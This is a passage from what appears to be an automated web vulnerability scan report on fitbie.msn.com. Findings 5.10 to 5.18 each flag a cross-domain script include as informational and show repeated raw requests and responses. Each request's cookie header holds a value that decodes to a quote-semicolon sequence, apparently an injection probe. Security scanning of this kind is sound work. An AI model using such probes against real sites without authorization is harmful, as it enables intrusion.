ETag: "1297607179-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42931
Expires: Mon, 14 Feb 2011 02:26:21 GMT
Date: Sun, 13 Feb 2011 14:30:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.10. http://fitbie.msn.com/get-fit/strength-training

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /get-fit/strength-training

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /get-fit/strength-training HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:12 +0000
ETag: "1297607172-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42902
Expires: Mon, 14 Feb 2011 02:25:38 GMT
Date: Sun, 13 Feb 2011 14:30:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.11. http://fitbie.msn.com/get-fit/tips/3-get-closer-couple-stretches

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /get-fit/tips/3-get-closer-couple-stretches

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /get-fit/tips/3-get-closer-couple-stretches HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:24 +0000
ETag: "1297607184-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42933
Expires: Mon, 14 Feb 2011 02:26:26 GMT
Date: Sun, 13 Feb 2011 14:30:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 90939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.12. http://fitbie.msn.com/get-fit/tips/6-hard-body-winter-sports

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /get-fit/tips/6-hard-body-winter-sports

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /get-fit/tips/6-hard-body-winter-sports HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:29 +0000
ETag: "1297607189-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42934
Expires: Mon, 14 Feb 2011 02:26:31 GMT
Date: Sun, 13 Feb 2011 14:30:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 92615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.13. http://fitbie.msn.com/get-fit/tips/best-workouts-every-mood/tip/4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /get-fit/tips/best-workouts-every-mood/tip/4

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /get-fit/tips/best-workouts-every-mood/tip/4 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:22 +0000
ETag: "1297607182-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42927
Expires: Mon, 14 Feb 2011 02:26:20 GMT
Date: Sun, 13 Feb 2011 14:30:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.14. http://fitbie.msn.com/get-fit/tips/feel-good-fitness-strategies

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /get-fit/tips/feel-good-fitness-strategies

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /get-fit/tips/feel-good-fitness-strategies HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:27 +0000
ETag: "1297607187-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42908
Expires: Mon, 14 Feb 2011 02:26:03 GMT
Date: Sun, 13 Feb 2011 14:30:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.15. http://fitbie.msn.com/get-fit/walking

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /get-fit/walking

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /get-fit/walking HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:14 +0000
ETag: "1297607174-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42899
Expires: Mon, 14 Feb 2011 02:25:37 GMT
Date: Sun, 13 Feb 2011 14:30:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.16. http://fitbie.msn.com/get-fit/women

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /get-fit/women

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /get-fit/women HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1297607171-1"
Last-Modified: Sun, 13 Feb 2011 14:26:11 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42931
Expires: Mon, 14 Feb 2011 02:26:22 GMT
Date: Sun, 13 Feb 2011 14:30:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 104926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.17. http://fitbie.msn.com/get-fit/yoga

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /get-fit/yoga

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /get-fit/yoga HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:16 +0000
ETag: "1297607176-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42891
Expires: Mon, 14 Feb 2011 02:25:39 GMT
Date: Sun, 13 Feb 2011 14:30:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
</div>
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...

5.18. http://fitbie.msn.com/look-and-feel-thinner/3-abs-myths-busted

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /look-and-feel-thinner/3-abs-myths-busted

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /look-and-feel-thinner/3-abs-myths-busted HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:53 +0000
ETag: "1297607333-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42782
Expires: Mon, 14 Feb 2011 02:29:12 GMT
Date: Sun, 13 Feb 2011 14:36:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 92409

